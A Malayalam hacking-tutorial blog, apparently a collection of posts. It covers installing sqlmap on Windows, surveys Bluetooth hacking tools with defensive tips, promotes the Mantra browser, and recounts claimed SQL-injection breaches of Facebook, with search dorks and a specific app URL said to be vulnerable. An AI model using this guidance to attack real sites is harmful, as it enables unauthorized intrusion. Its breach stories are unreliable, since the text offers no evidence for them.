2 പൈത്തൺ (പ്രോഗ്രാമിങ്ങ് ഭാഷ) ഇവിടെ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യാം

കമ്പ്യൂട്ടർ ശാസ്ത്രത്തിലെ ഒരു ഹൈലെവൽ പ്രോഗ്രാമിങ് ഭാഷയാണ്‌ പൈത്തൺ. ​​​എഴുതുന്ന പ്രോഗ്രാം ​​ എളുപ്പത്തിൽ വായിച്ചു മനസ്സിലാക്കാം ​എന്നത് പൈത്തണിന്റ പ്രധാന സവിശേഷതകളിലൊന്നാണ്.​ 1991-ൽ ഗൈഡോ വാൻ റോസ്സിന്റെ നേതൃത്വത്തിലാണ്‌ ഇത് എഴുതിയത്. കൂടുതല്‍ വിവരങ്ങള്‍ക്ക് ഇവിടം സന്ദര്‍ശിക്കുക http://python4school.blogspot.com ഇതൊരു മലയാളം ബ്ലോഗ്‌ ആണ് സിമ്പിള്‍ ആയി  പൈത്തൺ. പഠിക്കാന്‍ ഈ ബ്ലോഗ്‌ നിങ്ങളെ സഹായിക്കും,

3 ഇനി പൈത്തൺ എന്ന സോഫ്റ്റ്‌വെയര്‍ നമുക്ക് വിന്‍ സേവിനില്‍ ഇന്‍സ്റ്റാള്‍ ചെയ്യാം

.
പൈത്തൺ ഇന്‍സ്റ്റാള്‍ ചെയ്യുമ്പോള്‍ C:\Python27\  എന്ന ഡിക്ഷ്ണറി ആണ് കാണിക്കുക അത് മാറ്റി C:\Python\  എന്ന് ആക്കുക.  ഇങ്ങനെ മാറ്റണം എന്ന് നിര്‍ബ്ബന്ധം ഒന്നുമില്ല എന്നാലും ഒരു രസം.
ബാക്കിയെല്ലാം നെക്സ്റ്റ്,എസ് ഒക്കെ അടിച്ചു ഇന്‍സ്റ്റാള്‍ ചെയ്തോ.
അപ്പൊ പൈത്തൺ  ഇന്‍സ്റ്റാള്‍ ആയില്ലേ..?

4 ഇനിയാണ് എസ്.ക്യു.എൽ. മാപ് എന്ന സോഫ്റ്റ്‌വെയര്‍ പാക്ക് ഓപ്പണ്‍ ചെയ്യുക. ഇതൊരു സിപ് ഫയല്‍ ആകും. ഞാന്‍ ഇവിടെ വിന്‍രാര്‍ എന്നാസോഫ്റ്റ്‌വെയര്‍ ആണ് എക്സ്ട്രാക്റ്റ് ചെയ്യാന്‍ ഉപയോഗികുന്നത്. 


ഞാന്‍ ഈ എസ്.ക്യു.എൽ. മാപ് എന്ന സിപ് പാക്ക് C:\Python\  എന്ന വിന്‍ഡോലേക്ക് എക്സ്ട്രാക്റ്റ് ചെയ്തു.

5 ഇനി നിങ്ങളുടെ ഡെസ്ക്ടോപ്പിലെക്ക് പോവുക എന്നിട്ട് 

goto to desktop right click >> New >> Shortcut

6 ഈ ചിത്രങ്ങളില്‍ കാണിച്ചതുപോലെ ഫസ്റ്റ് വിന്‍ഡോയില്‍ cmd എന്നും 



7 രണ്ടാമത്തെയില്‍ Sql Map എന്നും നല്‍ക്കുക.



8 ഇപ്പോള്‍ നിങ്ങളുടെ ഡെസ്ക്ടോപ്പില്‍ ഒരു സി.എം.ഡി ഐകന്‍ വന്നു അല്ലെ അതില്‍ റൈറ്റ് ക്ലിക്ക് ചെയ്തു "start in:" എന്ന സ്ഥാനത്തു C:\Python എന്ന് നല്‍കി അപ്പളേ > പിന്നെ ഒക്ക..കൊടുത്തേക്ക്. 

(സാധാരണ അവിടെ C:\Windows\system32 എന്നാകും കാണിക്കുക )


അങ്ങനെ എല്ലാതും കഴിഞ്ഞു.
ഇനി ഈ എസ്.ക്യു.എൽ. മാപ് വര്‍ക്ക്‌ ചെയ്തു നോക്കണ്ടേ..?

9 അതിനുവേണ്ടി ഡെസ്ക്ടോപ്പിലെ ആ Sql Map എന്ന ഐകന്‍ ഡബിള്‍ ക്ലിക്ക് ചെയ്തു നോക്കു..

ഇപ്പോള്‍ ഇങ്ങനെ ഒരു വിന്‍ഡോ കാണാം..!


10 അതില്‍ python sqlmap/sqlmap.py  എന്ന കോഡ് അടിച്ചു നോക്ക് എന്നിട്ട് എന്റര്‍ അമര്‍ത്തുക..രണ്ടു സെക്കന്റ്‌നുള്ളില്‍ ഇങ്ങനെ വരും..


എന്നാല്‍ ഇനി ഹാക്കിംഗ് തുടങ്ങി കൊള്ളൂ..!
സംശയങ്ങള്‍ ഉണ്ടെങ്കില്‍ ചോതിക്കാന്‍ മറകല്ലേ..#

ബ്ലൂടൂത്ത് ഹാക്കിംഗ് സോഫ്റ്റ്‌വെയറുകള്‍




ശ്രദ്ധിക്കുക. ഇത് ജനങ്ങള്‍ക്ക് ഹാക്കിംഗ് എന്ത് എന്നതിനെക്കുറിച്ച് ഒരു അവബോധം സ്രഷ്ടിച്ചെടുക്കുന്നതിനുള്ള ഒരു പോസ്റ്റാണ്. തികച്ചും വിദ്യാഭ്യാസപരം. ചെയ്ത് നോക്കി ഉണ്ടാകുന്ന ഭവിഷ്യത്തുകള്‍ക്ക് ഞങ്ങള്‍ ഉത്തരവാദി ആയിരിക്കുന്നതല്ല.

സൈബര്‍ സെക്കിന്‍റെ വായനക്കാരെ..ഇന്നു ഞാന്‍ നിങ്ങള്‍ക്ക് പരിജയപെടുത്തുന്നത് ബ്ലൂടൂത്ത് ഹാക്കിംഗ് സോഫ്റ്റ്‌വെയറുകളെ കുറിച്ചാണ്. നിങ്ങള്‍ ദയവ് ചെയ്തു ഇതൊരു എത്തിക്കല്‍ ഹാക്കിംഗ് കോഴ്സ്‌ ആയി മാത്രം കാണുക.  കാരണം ഇങ്ങനെയാണ് ഹാക്കര്‍മാര്‍ സാധാരണ നിങ്ങളുടെ ഫോണ്‍ ഹാക്ക്‌ ചെയ്യുന്നത്. എന്ന് പരിജയപെടുത്തുവാന്‍ വേണ്ടി മാത്രമാണ് ഞാന്‍ ഇത്തരമൊരു പോസ്റ്റ്‌ ഇടുന്നത്. സ്ത്രീകള്‍ തീര്‍ച്ചയായും ഈ പോസ്റ്റ്‌ വായിച്ചിരിക്കുക...

ഇത്തരം ബ്ലൂടൂത്ത് ഹാക്കിംഗ് സോഫ്റ്റ്‌വെയറുകള്‍ വിദ്യാഭ്യാസപരമായ കാര്യങ്ങള്‍ക്കു വേണ്ടിയാണ് നിര്‍മ്മിക്കുന്നത്, ഇതിലെ ഏറ്റവും അപകടകരമായ BT Info എന്ന സോഫ്റ്റ്‌വെയര്‍ നിര്‍മിച്ചത് യുറോപിലെ സ്ലോവാക്യ എന്ന പ്രദേശത്തെ മാര്‍ക്ക്‌ സെഡിവി എന്ന 16കാരനാണ്. ഈ സോഫ്റ്റ്‌വെയര്‍ സോണി എറിക്സണ്‍ ഫോണുകളിലാണ് കൂടുതല്‍ അപകടകാരിയാകുന്നത്. അതുപോലെത്തന്നെ ബ്ലൂടൂത്തിലെ സുരക്ഷാപ്രശ്നങ്ങള്‍ തുറന്നു കാണിക്കുവാനും വേണ്ടി ഇത്തരം സോഫ്റ്റ്‌വെയറുകള്‍ നിര്‍മിക്കുന്നുണ്ട്,


ഒരു കണക്കിനു ബ്ലൂടൂത്ത് നെറ്റ്‌വര്‍ക്കുകള്‍ മറ്റുള്ള നെറ്റ്‌വര്‍ക്കുകളെ അപേക്ഷിച്ച് കൂടുതല്‍ സുരക്ഷിതമാണെന്ന് പറയാം. കാരണം നിങ്ങള്‍ ബ്ലൂടൂത്ത് വഴി മറ്റൊരാള്‍ക്ക്‌ ഏതെങ്കിലും ഒരു ഫയല്‍ അയച്ചു കൊടുത്താല്‍ അവ റീസിവ്‌ ചെയ്യണമെങ്കില്‍, റീസിവ്‌ ചെയ്യുന്ന ആള്‍ ആ ഫയല്‍ Accept ചെയ്യണം എന്നാല്‍ മാത്രമേ അവിടെ ഒരു ഫയല്‍ ട്രാന്‍സ്ഫറിങ് നടക്കുകയോളളു.

എന്നാല്‍ നിങ്ങളുടെ മൊബൈല്‍ മറ്റൊരു മൊബൈലുമായി പെയര്‍ ചെയ്താല്‍ നിങ്ങള്‍ അറിയാതെ തന്നെ മറ്റുള്ളവര്‍ക്ക് നിങ്ങളുടെ മൊബൈലിലെ വിവരങ്ങള്‍ ചോര്‍ത്തുവാനും കഴിയും.


ഈ മൊബൈല്‍ ബ്ലൂടൂത്ത് പെയറിംഗ് ആണ് ബ്ലൂടൂത്ത് നെറ്റ്‌വര്‍ക്കുകളുടെ സുരക്ഷാ പാളിച്ച. പക്ഷെ ഈ ബ്ലൂടൂത്ത് പെയറിംഗ് ചില സമയങ്ങളില്‍ നിങ്ങള്‍ക്കു ഒഴിച്ചുകൂടാനാവാത്തതാണ്.

ബ്ലൂടൂത്ത് ഹാക്കിംഗ് സോഫ്റ്റ്‌വെയറുകളില്‍ രക്ഷനേടാനുള്ള ആകെയുള്ള പോംവഴി 

1 ബ്ലൂടൂത്ത് ഹിഡന്‍ ചെയ്യുക.

2 നിങ്ങളുടെ മൊബൈല്‍ ബ്ലൂടൂത്ത് സെറ്റിങ്സില്‍ പോയി വിശ്വാസമില്ലാത്ത പെയര്‍ കണക്ടിവിറ്റി റീമൂവ് ചെയ്യുക.

ഹാക്കര്‍മാരുടെ വെബ്‌ ബ്രൌസര്‍


മന്ത്ര ഒരു സാധാരണ വെബ്‌ ബ്രൌസര്‍ അല്ല ഹാക്കര്‍മാര്‍ക്ക് വേണ്ടി ഹാക്കിംഗ് പ്ലഗ്ഗിന്‍, ആഡ് ഓണ്‍, എന്നിങ്ങനെ പലതരം ടൂള്‍സ് ഇന്‍സ്റ്റാള്‍ ചെയ്തു ഇറക്കിയതാണ് മന്ത്ര സെക്യൂരിറ്റി ടൂള്‍കിറ്റ്‌ എന്ന ഓപ്പണ്‍സോഴ്സ് വെബ്‌ ബ്രൌസര്‍.

ലോകത്തെമ്പാടുമുള്ള ഹാക്കര്‍മാരുടെ ഓണ്‍ലൈന്‍ അനുഭവങ്ങളെ കൂടുതല്‍ ആനന്ദകരവും എളുപ്പമുള്ളതും സൗകര്യപ്രദവുമാക്കാനായി സ്വതന്ത്രവും തുറന്നതുമായ സോഫ്റ്റ്‌വേര്‍ ഉല്‍പന്നങ്ങളും ടെക്നോളജികളും നിര്‍മ്മിക്കുക എന്ന ഉദ്ദേശ്യത്തോടെ പ്ര്വര്‍ത്തിക്കുന്ന ഒരു ആഗോള കൂട്ടായ്മയാണ് മന്ത്ര നെറ്റ്‌വര്‍ക്ക് വെബ് ബ്രൌസര്‍ തുടങ്ങിയത്.


ഇത് ഒരു സ്വതന്ത്രവും തുറന്നതുമായ ഒരു പൊതുസ്വത്തായി തുടരും എന്നു ഉറപ്പു വരുത്തുന്നതിനായി പ്രവര്‍ത്തിക്കുന്ന പ്രോഗ്രാമ്മര്‍മാരും,പെന്‍ ടെസ്റ്റര്‍മാരും ഉണ്ട് മന്ത്ര എന്ന വെബ്‌ ബ്രൌസര്‍ നിര്‍മാണത്തിന്‍ പിന്നില്‍.

"ഞങ്ങള്‍.തുറന്നതും സ്വതന്ത്രവുമായ സ്റ്റാന്‍ഡേര്‍ഡുകള്‍ കൂടുതല്‍ നവീനവും പുരോഗമനപരവുമായ ചിന്തയെയും അങ്ങനെ തിരഞ്ഞെടുക്കാനായി കൂടുതല്‍ ഉല്‍പ്പന്നങ്ങളുണ്ടാകുന്നതിനെയും പ്രോത്സാഹിപ്പിക്കുമെന്നും , സുരക്ഷിതവും വേഗത്തിലുള്ളതുമായ ഏറ്റവും നല്ല ഓണ്‍ലൈന്‍ അനുഭവങ്ങള്‍ എല്ലാവരുടെയും അവകാശവുമാണെന്നും വിശ്വസിക്കുന്നവരുമാണ് ഞങ്ങള്‍." എന്നാണ് മന്ത്ര നെറ്റ്‌വര്‍ക്കിന്‍റെ  സ്ഥാപകനായ  അഭി.എം.ബാലകൃഷ്ണന്‍ പറയുന്നത്.

ഈ ബ്രൌസര്‍ വിന്‍ഡോസ്‌, ലിനക്സ്‌, മാക് എന്നി ഓ.എസ്കളില്‍ വര്‍ക്ക്‌ ചെയ്യും.

ഈ ബ്രൌസര്‍ ഡൌണ്‍ലോഡ് ചെയ്യാന്‍ സന്ദര്‍ശിക്കു.
http://www.getmantra.com


ഫേസ്ബുക്ക് ഹാക്ക്‌ ചെയ്യാം ?



സോഷ്യല്‍ നെറ്റ്‌വര്‍ക്ക് ആയ ഫേസ്ബുക്ക് ആരെങ്കില്ലും ഹാക്ക്‌ ചെയ്തിട്ടുണ്ടോ.? ഇന്നു എല്ലാ കുട്ടികളും ആദ്യം ഗൂഗിള്‍ള്ളില്‍ സേര്‍ച്ച്‌ ചെയ്യുന്നത് how to hack a facebook account എന്ന ഗൂഗിള്‍ ഡോര്‍ക്ക് ആണ്. ഫേസ്ബുക്ക് ഹാക്ക്‌ ചെയ്യാന്‍ പല വഴികളും ഉണ്ട് പക്ഷെ എന്തു തന്നെ ചെയ്താല്ലും നിങ്ങള്‍ക്ക് അതിന്‍റെ റിസള്‍ട്ട്‌ കിട്ടില്ല കാരണം ഇന്നു ഫേസ്ബുക്ക് അഡ്മിന്‍സ് അതിന്‍റെ സെര്‍വര്‍ ഹാക്കര്‍മാരില്‍ നിന്നും രക്ഷിക്കാന്‍ വേണ്ടി കോടികള്‍ മുടക്കുന്നു..#


ഈ ഫേസ്ബുക്ക് 2010-04-07ന് ഇഞ്ഞെക്ടര്‍ എന്ന ഹാക്കര്‍ ഗ്രൂപ്പിനു മുന്നില്‍ തലകുനിച്ചു. വളരെ സിമ്പിള്‍ ആയി എസ്‌.ഖു.എല്‍ ഇന്‍ജേക്ഷന്‍ കൊണ്ട് അവര്‍ ഫേസ്ബുക്കിന്‍റെ സെര്‍വര്‍ ഡംപ് ചെയ്തു അതിനു വേണ്ടി അവര്‍ ഉപയോഗിച്ചത് എസ്‌.ഖു.എല്‍ മാപ് എന്ന ഹാക്കിംഗ് ടൂള്‍

ഫേസ്ബുക്ക് സെര്‍വര്‍ ഹാക്ക്‌ ചെയ്യുക എന്നൊരു ലക്ഷ്യം മനസില്‍ കണ്ടുകൊണ്ട് Farzin0123(Pianist) എന്ന്‍ പേരുള്ള ഹാക്കര്‍ വളരെ സാഹസികമായി ഫേസ്ബുക്ക് സെര്‍വര്‍ ഹാക്ക്‌ ചെയ്തു. ആദ്യം അദ്ദേഹം ചെയ്തത് ഫേസ്ബുക്കിന്‍റെ സുരക്ഷാ പാളിച്ചകള്‍ കണ്ടെത്തുകയായിരുന്നു. അതിനു വേണ്ടി ആ ഹാക്കര്‍ ഫേസ്ബുക്ക് സെര്‍വര്‍ പോര്‍ട്ട്‌കള്‍ സ്കാന്‍ ചെയ്തു പക്ഷെ സെര്‍വര്‍ ഹാക്ക്‌ ചെയ്യാന്‍ പറ്റുന്ന തരത്തില്ലുള്ള സുരക്ഷാ പാളിച്ചകള്‍  ഒന്നും തന്നെ കണ്ടെത്താനായില്ല.

പിന്നെ ഗൂഗിള്‍ ഡോര്‍ക്ക്
 Facebook+Vulnerability
ഉപയോഗിച്ച് ഫേസ്ബുക്ക് എക്സ്പ്ലോയിറ്റ് സേര്‍ച്ച്‌ ചെയ്തു കുറെ  ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്  ഹോള്‍കള്‍ കിട്ടി പക്ഷെ അപ്പോഴേക്കും ആ എക്സ്പ്ലോയിറ്റ് എല്ലാം തന്നെ ഫേസ്ബുക്ക് ഫിക്സ് ചെയ്തിരുന്നു. എന്നാല്‍
site:facebook.com WARNING error
 എന്ന ഡോര്‍ക്ക് ഉപയോഗിച്ചപോള്‍ കുറെ റിസള്‍ട്ട്‌ കിട്ടി അതിലെ ടിവി ഷോ കാസറ്റ്‌ എന്ന അപ്ലിക്കേഷനിലെ ഒരു സുരക്ഷാ പാളിച്ച കണ്ടെത്തിയ   Farzin012 എന്ന ഹാക്കര്‍
http://apps.facebook.com/tvshowchat/show.php?id=1  

Xybersec

ലിങ്കില്‍ എസ്‌.ഖു.എല്‍ ഇന്‍ജേക്ഷന്‍ ചെയ്തു കൊണ്ട് ഫേസ്ബുക്കിന്‍റെ ഡാറ്റാബേസ് ഹാക്ക്‌ ചെയ്തു
-------------------------------------------------------------------------------------------------------------
പാകിസ്ഥാനി ഹാക്കര്‍ & സെക്യൂരിറ്റി റീസെര്‍ച്ചര്‍ ആയ അദ്നാന്‍ അന്‍ജും ഫേസ്ബുക്ക് ഹാക്ക്‌ ചെയ്തതിന്‍റെ തെളിവുകള്‍ താഴെ കൊടുക്കുന്നു
http://hackguide4u.blogspot.in/2010/05/facebook-sql-injection.html




ഇത്തരം ഹാക്കിംഗ് പ്രവര്‍ത്തികള്‍ ഫേസ്ബുക്കിനു നേരെ നടത്തിയ അദ്നാന്‍ അന്‍ജുംനെ 15 വര്‍ഷത്തേക്ക് ഇന്റര്‍നെറ്റ്‌ ഉപയോഗിക്കുന്നത് പാകിസ്ഥാന്‍ ഫെഡറല്‍ ഇന്‍വെസ്ടിഗേഷന്‍ ഏജന്‍സി വിലക്കി.

 ഫേസ്ബുക്ക് സെര്‍വര്‍ ഹാക്ക്‌ ചെയ്യ്ത   Farzin0123(Pianist) ന്‍റെ എക്സ്പ്ലോയിറ്റ് നിങ്ങള്‍ക്ക് ഇവിടെ നിന്നും വായിക്കാം
http://pastehtml.com/view/c3bgaotuc


ഈയിടെയായി സൈബര്‍ സെക് കണ്ടെത്തിയ ഫേസ്ബുക്ക്  എസ്‌.ഖു.എല്‍ ഇന്‍ജേക്ഷന്‍ സുരക്ഷാ പാളിച്ച.